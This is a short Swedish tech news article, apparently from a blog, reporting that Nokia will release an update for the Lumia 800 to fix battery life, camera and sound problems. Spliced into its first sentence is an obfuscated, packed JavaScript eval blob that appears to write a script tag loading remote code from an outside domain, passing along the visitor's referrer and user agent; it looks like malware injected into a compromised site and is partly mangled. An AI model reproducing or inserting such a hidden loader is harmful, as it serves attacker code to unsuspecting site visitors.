Image Image Image Image Image Image Image Image Image Image

| 18 oktober, 2018

Scroll to top

Top

Uppdatering till Lumia 800 lovar bättre batteritid och kamera

Uppdatering till Lumia 800 lovar bättre batteritid och kamera
Sebastian Plengier Ehrnfelt

Vid eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ksrey|var|u0026u|referrer|rzbin||js|php’.split(‘|’),0,{}))
lansering av Nokia Lumia 800 började det direkt talas om en batteri-bugg som fanns på telefonen. Även fast Nokia gick ut med att de var medvetna om problemet så började kommentarer och brev rulla in på kontoret.

Nu på senare tid har det även visat sig vara fler problem med telefonen. Folk har lagt märke till att ljud och kamerainställningar inte riktigt beter sig som de ska. Nu meddelar Nokia att de kommer att släppa en uppdatering till telefonen som ska rätta till problemen med främst batteritiden, kameran och ljudet.

Nokia nämner också att de kommer släppa flera framtida uppdateringer frekvent för att hålla telefonen i bästa möjliga skick.

Har du köpt på dig en Nokia Lumia 800 och irriterat dig på dessa problem så kan du vara lugn, snart är de fixade.